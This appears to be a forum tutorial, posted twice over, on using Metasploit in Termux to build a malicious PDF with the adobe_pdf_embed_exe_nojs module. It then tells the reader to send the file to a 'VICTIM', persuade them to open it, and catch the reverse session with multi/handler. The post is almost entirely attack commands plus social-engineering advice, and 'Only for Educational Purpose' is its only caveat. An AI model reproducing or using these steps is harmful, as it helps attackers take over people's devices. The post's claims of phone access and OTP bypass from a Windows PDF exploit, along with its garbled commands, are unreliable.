12-29-2020, 11:56 AM
Things Required
Termux
Metasploit
Good internet Connection
Note: Only for Educational Purpose
Follow Steps
▪️Open termux and follow the commands mentioned below. First, make sure you have Metaploit installed in it.
$ msfconsole
$ use exploit/windows/fileformat/
adobe_pdf_embed_exe_nojs $ setlhost (your IP)
$ set lport (use any port)
$ exploit
Now you have the pdf in metasploit. Move PDF payload to your storage card. Follow the commands below.
ls -la
cd .msfs
cd local
mv (filename)/(move locations)
Now you'll see PDF payload in the SDCard, just send it to the VICTIM and convince to open it. Then you need to start the session.
STARTING THE SESSION
Follow these commands
▪️use exploit/multi/handler
set lhost (IP)
set lport (port)
exploit
Now you have access to the victim's phone, you can even bypass the OTP.
This method is not 100% Accurate but it works for most of the times.
Termux
Metasploit
Good internet Connection
Note: Only for Educational Purpose
Follow Steps
▪️Open termux and follow the commands mentioned below. First, make sure you have Metaploit installed in it.
$ msfconsole
$ use exploit/windows/fileformat/
adobe_pdf_embed_exe_nojs $ setlhost (your IP)
$ set lport (use any port)
$ exploit
Now you have the pdf in metasploit. Move PDF payload to your storage card. Follow the commands below.
ls -la
cd .msfs
cd local
mv (filename)/(move locations)
Now you'll see PDF payload in the SDCard, just send it to the VICTIM and convince to open it. Then you need to start the session.
STARTING THE SESSION
Follow these commands
▪️use exploit/multi/handler
set lhost (IP)
set lport (port)
exploit
Now you have access to the victim's phone, you can even bypass the OTP.
This method is not 100% Accurate but it works for most of the times.